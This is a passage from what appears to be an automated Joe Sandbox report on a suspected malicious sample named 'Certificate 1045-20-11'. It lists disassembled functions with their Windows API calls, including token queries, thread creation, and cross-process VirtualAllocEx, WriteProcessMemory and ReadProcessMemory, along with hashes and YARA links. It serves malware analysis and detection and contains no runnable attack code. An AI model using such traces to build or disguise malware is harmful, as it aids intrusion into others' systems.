                                                                                • Opcode Fuzzy Hash: b5b8919717f411fcc42c7592a28b67c134d10dd308629937909a6bffaf9e5a63
                                                                                • Instruction Fuzzy Hash: 61217170814709EFDB109F55EC84B9A7BB8F720356F18432AF821D21E0C3715849EB51
                                                                                Function 0086217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __calloc_crt.LIBCMT ref: 008621A9
                                                                                • CreateThread.KERNEL32(?,?,008622DF,00000000,?,?), ref: 008621ED
                                                                                • GetLastError.KERNEL32 ref: 008621F7
                                                                                • _free.LIBCMT ref: 00862200
                                                                                • __dosmaperr.LIBCMT ref: 0086220B
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                • String ID:
                                                                                • API String ID: 2664167353-0
                                                                                • Opcode ID: 9b915a25e5ce262221b6c1021d619d5ec568b2399f84a5155707add4222e6d86
                                                                                • Instruction ID: ab50906d5a20390c31ff3d63c77ed11682023690a5198ac82e9468f1e068806b
                                                                                • Opcode Fuzzy Hash: 9b915a25e5ce262221b6c1021d619d5ec568b2399f84a5155707add4222e6d86
                                                                                • Instruction Fuzzy Hash: AD110833108746AFDB11AFA9DC41D9B7BA8FF01774B120569FE24C6241EB71D81187E2
                                                                                Function 0087ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0087ABD7
                                                                                • GetLastError.KERNEL32(?,0087A69F,?,?,?), ref: 0087ABE1
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,0087A69F,?,?,?), ref: 0087ABF0
                                                                                • HeapAlloc.KERNEL32(00000000,?,0087A69F,?,?,?), ref: 0087ABF7
                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0087AC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 842720411-0
                                                                                • Opcode ID: c0a735469788d94e3cace8be28ed5031ec02880d771d54980179bc655554e5e5
                                                                                • Instruction ID: 9c7ff032513551e4405b80f75fe1d9af1daa48b18294277351e56c52b4092c93
                                                                                • Opcode Fuzzy Hash: c0a735469788d94e3cace8be28ed5031ec02880d771d54980179bc655554e5e5
                                                                                • Instruction Fuzzy Hash: C101F6B1200204BFDB165FAADC48DAB7ABDFFCA7557104429F949C2260DA71DC41DAA1
                                                                                Function 00879ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CLSIDFromProgID.OLE32 ref: 00879ADC
                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00879AF7
                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00879B05
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00879B15
                                                                                • CLSIDFromString.OLE32(?,?), ref: 00879B21
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: ce3154e8a204e11e444cf2e0a1c45793c3f82cb0acdba50d0af623b81f28f2fe
                                                                                • Instruction ID: c798d76bf555a0b93da327d3585dd8f3a23defba1c8fac3282503a97695b4f6e
                                                                                • Opcode Fuzzy Hash: ce3154e8a204e11e444cf2e0a1c45793c3f82cb0acdba50d0af623b81f28f2fe
                                                                                • Instruction Fuzzy Hash: A9018F76610229BFDB105F64EC44F9ABAFDFB44361F148438F949D2210E770DD409BA0
                                                                                Function 00887A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887A74
                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00887A82
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00887A8A
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00887A94
                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: 412fc53bf2e54a62afb794c83ec4f22492e6136bdb4b7af4f307da8daf6c2c84
                                                                                • Instruction ID: 448562003769a5f46f7b52b5113d3deae83de2422409551bfbce775fc87c74b0
                                                                                • Opcode Fuzzy Hash: 412fc53bf2e54a62afb794c83ec4f22492e6136bdb4b7af4f307da8daf6c2c84
                                                                                • Instruction Fuzzy Hash: 03011731C0462DABDF04BFA4D888AEDBB78FB08711F154466E502F2290DB30965087A1
                                                                                Function 0087AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0087AADA
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0087AAE4
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0087AAF3
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0087AAFA
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0087AB10
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: ee31c854bf86c5245c4c6e40852620471c06514fd8553817c62914ef2ee5f65f
                                                                                • Instruction ID: a926f5c305fe162ef06088b9045c50729283ffe2da53c1d6ca988ca846a2cfad
                                                                                • Opcode Fuzzy Hash: ee31c854bf86c5245c4c6e40852620471c06514fd8553817c62914ef2ee5f65f
                                                                                • Instruction Fuzzy Hash: CBF04F712013086FEB151FA5EC88E6B7B7DFF85764F004039F945C7190DA70D8029A61
                                                                                Function 0087AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0087AA79
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0087AA83
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0087AA92
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0087AA99
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0087AAAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 5a95e42e4f06b494e96d64565e04fa73587cabdf51788775fbadec01a6957cb3
                                                                                • Instruction ID: d09f86ebacbf1ab83eedd9929f272e5ed1d262c8beaf6ad038a769726deeb5f7
                                                                                • Opcode Fuzzy Hash: 5a95e42e4f06b494e96d64565e04fa73587cabdf51788775fbadec01a6957cb3
                                                                                • Instruction Fuzzy Hash: 8EF04F712003146FEB116FA5AC89E6BBBBCFF89758F044429F945C7190DA70DC42DB61
                                                                                Function 0087EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0087EC94
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0087ECAB
                                                                                • MessageBeep.USER32(00000000), ref: 0087ECC3
                                                                                • KillTimer.USER32(?,0000040A), ref: 0087ECDF
                                                                                • EndDialog.USER32(?,00000001), ref: 0087ECF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 765166b9b0243ffff20e35f07f2015a98996be342a167b342f4c93635f180642
                                                                                • Instruction ID: 605a4c2e301b7679a444f1ec42ab3010a18952a0601e504d199daf8830061673
                                                                                • Opcode Fuzzy Hash: 765166b9b0243ffff20e35f07f2015a98996be342a167b342f4c93635f180642
                                                                                • Instruction Fuzzy Hash: 4C01F434510704ABEB216B10DE4EF9677B8FF04705F0045A9B687E10E0DBF0EA54CB80
                                                                                Function 0085B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 0085B0BA
                                                                                • StrokeAndFillPath.GDI32(?,?,008BE680,00000000,?,?,?), ref: 0085B0D6
                                                                                • SelectObject.GDI32(?,00000000), ref: 0085B0E9
                                                                                • DeleteObject.GDI32 ref: 0085B0FC
                                                                                • StrokePath.GDI32(?), ref: 0085B117
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: 6a73afa660de600a7284cba4e8fd406f91c8875610274d4969d3ef041de60132
                                                                                • Instruction ID: db9dc8825a10829792ad27025995b18478a23e5593e3d6d70852c5acadb6d1bb
                                                                                • Opcode Fuzzy Hash: 6a73afa660de600a7284cba4e8fd406f91c8875610274d4969d3ef041de60132
                                                                                • Instruction Fuzzy Hash: 26F0C930018A48EFDB21AF69EC0DB553BB5F710366F088325F825850F1C772895AEF50
                                                                                Function 0088F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0088F2DA
                                                                                • CoCreateInstance.OLE32(008CDA7C,00000000,00000001,008CD8EC,?), ref: 0088F2F2
                                                                                • CoUninitialize.OLE32 ref: 0088F555
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 948891078-24824748
                                                                                • Opcode ID: 2ee4c91bb84012908e410d46c2b16850db43855857de8722cf304ede26150115
                                                                                • Instruction ID: c0ab0e8c189ba63e8024f22923d256cf0e7ddee7d585242fddfdbeaad5586a8a
                                                                                • Opcode Fuzzy Hash: 2ee4c91bb84012908e410d46c2b16850db43855857de8722cf304ede26150115
                                                                                • Instruction Fuzzy Hash: 35A12A71104205AFD700EF68C881EABB7ACFF99714F40496DF595D7292EB70EA09CB62
                                                                                Function 0088E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0084660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008453B1,?,?,008461FF,?,00000000,00000001,00000000), ref: 0084662F
                                                                                • CoInitialize.OLE32(00000000), ref: 0088E85D
                                                                                • CoCreateInstance.OLE32(008CDA7C,00000000,00000001,008CD8EC,?), ref: 0088E876
                                                                                • CoUninitialize.OLE32 ref: 0088E893
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                • String ID: .lnk
                                                                                • API String ID: 2126378814-24824748
                                                                                • Opcode ID: eb70247646d0a89570ad731998151f4b1e081825c1b37f4372fe504816e959db
                                                                                • Instruction ID: ebd16add4a8a6bb17d9f4aadc03fb71121ec01b76c9bf587ea2b1f7c24d6af05
                                                                                • Opcode Fuzzy Hash: eb70247646d0a89570ad731998151f4b1e081825c1b37f4372fe504816e959db
                                                                                • Instruction Fuzzy Hash: C5A123356043059FCB14EF18C88492ABBE5FF89710F048958F996DB3A2CB31ED45CB92
                                                                                Function 0086325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 008632ED
                                                                                  • Part of subcall function 0086E0D0: __87except.LIBCMT ref: 0086E10B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__87except__start
                                                                                • String ID: pow
                                                                                • API String ID: 2905807303-2276729525
                                                                                • Opcode ID: 349885722589f2bf6bd500cec53f65095d82f5e2ebc26f32afc9032aa8c39854
                                                                                • Instruction ID: b229577cf059522d18d0906db9100506ced22ad0fe8318bbe7d3eadeb3d6c51b
                                                                                • Opcode Fuzzy Hash: 349885722589f2bf6bd500cec53f65095d82f5e2ebc26f32afc9032aa8c39854
                                                                                • Instruction Fuzzy Hash: 8C51AC75A0920597CB117B18DA6277A3B94FB41721F228D29F0C5C23E9EF388E84E646
                                                                                Function 00884606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,008DDC50,?,0000000F,0000000C,00000016,008DDC50,?), ref: 00884645
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 008846C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                                • String ID: REMOVE$THIS
                                                                                • API String ID: 3797816924-776492005
                                                                                • Opcode ID: fd2388ae80def17079a798f2efef00dc20fc99f5b5b5a451ee1615ef0b47eacc
                                                                                • Instruction ID: be7bcfb40c14f210a67402e71830b8e1433d4facb9eb2df8c0c9d426c9b10610
                                                                                • Opcode Fuzzy Hash: fd2388ae80def17079a798f2efef00dc20fc99f5b5b5a451ee1615ef0b47eacc
                                                                                • Instruction Fuzzy Hash: 6D414A35A0021E9FCF01FFA8C881AAEB7B5FF49304F149069E956EB292DB349D45CB51
                                                                                Function 0087C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0088430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0087BC08,?,?,00000034,00000800,?,00000034), ref: 00884335
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0087C1D3
                                                                                  • Part of subcall function 008842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0087BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00884300
                                                                                  • Part of subcall function 0088422F: GetWindowThreadProcessId.USER32(?,?), ref: 0088425A
                                                                                  • Part of subcall function 0088422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0087BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0088426A
                                                                                  • Part of subcall function 0088422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0087BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00884280
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0087C240
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0087C28D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: a0f099a4c4d0897d546d17326cbfc9c5fed2598854d48c1a7dca69d08bd913a0
                                                                                • Instruction ID: 8f080aca57b9b4a548245c48f9a83563108663c483be0c09897948b3ed75e779
                                                                                • Opcode Fuzzy Hash: a0f099a4c4d0897d546d17326cbfc9c5fed2598854d48c1a7dca69d08bd913a0
                                                                                • Instruction Fuzzy Hash: C2411A7290021DAEDB11EFA8C981EEEB778FB19700F008099FA55B7181DA71AE45CB61
                                                                                Function 008AA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008DDC00,00000000,?,?,?,?), ref: 008AA6D8
                                                                                • GetWindowLongW.USER32 ref: 008AA6F5
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008AA705
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: 473404c64a7cbaa00f40ab4e5d79548f49a5ceac749afab52876e29855561dfd
                                                                                • Instruction ID: ed65c6b1b41d2e70333a0c19a16efc1b92f0a9a4b79300986a87b1ebc939965d
                                                                                • Opcode Fuzzy Hash: 473404c64a7cbaa00f40ab4e5d79548f49a5ceac749afab52876e29855561dfd
                                                                                • Instruction Fuzzy Hash: E431AE31100609AFEB258E38CC41BEA77A9FB5A324F244725F975D36E0D731E850DB51
                                                                                Function 008AA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008AA15E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008AA172
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 008AA196
                                                                                Strings
                                                                                Memory Dump Source
